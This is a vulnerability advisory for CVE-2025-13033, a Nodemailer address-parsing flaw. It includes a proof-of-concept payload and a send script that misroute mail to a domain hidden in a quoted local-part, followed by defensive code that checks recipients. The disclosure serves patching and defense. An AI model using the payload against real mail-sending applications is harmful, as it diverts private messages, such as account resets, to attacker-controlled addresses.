CVE-2025-13033: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
Nodemailer's email address parser incorrectly handles quoted local-parts that contain an `@`. This leads to misrouting of email recipients: the parser extracts and routes to an unintended domain instead of the RFC-compliant target domain.
Payload: "xclow3n@gmail.com x"@internal.domain
The following code was used to send mail with the payload as the recipient, and to show how an RFC-compliant parser reads the same address:

```javascript
const nodemailer = require("nodemailer");

let transporter = nodemailer.createTransport({
  service: "gmail",
  auth: {
    user: "", // Gmail account used for the test (left blank here)
    pass: "", // app password for that account (left blank here)
  },
});

let mailOptions = {
  from: '"Test Sender" <your_email@gmail.com>',
  // Quoted local-part containing "@"; the RFC-compliant domain is internal.domain
  to: "\"xclow3n@gmail.com x\"@internal.domain",
  subject: "Hello from Nodemailer",
  text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};

transporter.sendMail(mailOptions, (error, info) => {
  if (error) {
    return console.log("Error: ", error);
  }
  console.log("Message sent: %s", info.messageId);
});

// Parse the same recipient with an RFC-compliant parser for comparison
(async () => {
  const parser = await import("@sparser/email-address-parser");
  const { EmailAddress, ParsingOptions } = parser.default;
  const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);
  if (!parsed) {
    console.error("Invalid email address:", mailOptions.to);
    return;
  }
  console.log("Parsed email:", {
    address: `${parsed.localPart}@${parsed.domain}`,
    local: parsed.localPart,
    domain: parsed.domain,
  });
})();
```
Running the script shows how the address is parsed according to the RFC:

```
Parsed email: {
  address: '"xclow3n@gmail.com x"@internal.domain',
  local: '"xclow3n@gmail.com x"',
  domain: 'internal.domain'
}
```

But Nodemailer sends the email to xclow3n@gmail.com instead.
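As an added defensive example (not Nodemailer's code or the advisory's PoC), the following splits an address on the first unquoted `@`, honouring quoted local-parts and backslash escapes, and then applies a recipient check that refuses quoted local-parts containing `@` and enforces a domain allowlist before anything is handed to a mail library. The allowlist is an assumed application policy.

```javascript
// Added example, not part of Nodemailer: RFC-style split of an addr-spec into
// local-part and domain, plus a pre-send recipient check for the
// CVE-2025-13033 pattern (quoted local-part containing "@").

function splitAddress(addr) {
  // The first "@" outside a quoted string ends the local-part.
  let inQuotes = false;
  for (let i = 0; i < addr.length; i++) {
    const ch = addr[i];
    if (inQuotes && ch === "\\") { i++; continue; }   // skip escaped char in quotes
    if (ch === '"') { inQuotes = !inQuotes; continue; }
    if (ch === "@" && !inQuotes) {
      return { local: addr.slice(0, i), domain: addr.slice(i + 1) };
    }
  }
  return null; // no unquoted "@": not a valid addr-spec
}

// True when the local-part is a quoted string that itself contains "@":
// the shape a naive "split on some @" parser routes to the wrong domain.
function hasAtInQuotedLocalPart(addr) {
  const parts = splitAddress(addr);
  return parts !== null && parts.local.startsWith('"') && parts.local.includes("@");
}

// Recipient gate for a sending layer: the RFC domain must be on the allowlist
// (assumed application policy), and ambiguous quoted local-parts are refused
// outright so a mis-parsing library can never pick a different domain.
function checkRecipient(addr, allowedDomains) {
  const parts = splitAddress(addr);
  if (parts === null) return { ok: false, reason: "no domain" };
  if (hasAtInQuotedLocalPart(addr)) {
    return { ok: false, reason: "quoted local-part contains @" };
  }
  if (!allowedDomains.includes(parts.domain.toLowerCase())) {
    return { ok: false, reason: `domain ${parts.domain} not allowed` };
  }
  return { ok: true, domain: parts.domain };
}

// Constructed sample: the advisory's payload against an allowlist of internal.domain
const sample = '"xclow3n@gmail.com x"@internal.domain';
console.log(splitAddress(sample));                         // domain: 'internal.domain'
console.log(checkRecipient(sample, ["internal.domain"]));  // ok: false
```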
References
- access.redhat.com/security/cve/CVE-2025-13033
- bugzilla.redhat.com/show_bug.cgi?id=2402179
- github.com/advisories/GHSA-mm7p-fcc7-pg87
- github.com/nodemailer/nodemailer
- github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626
- github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87
- nvd.nist.gov/vuln/detail/CVE-2025-13033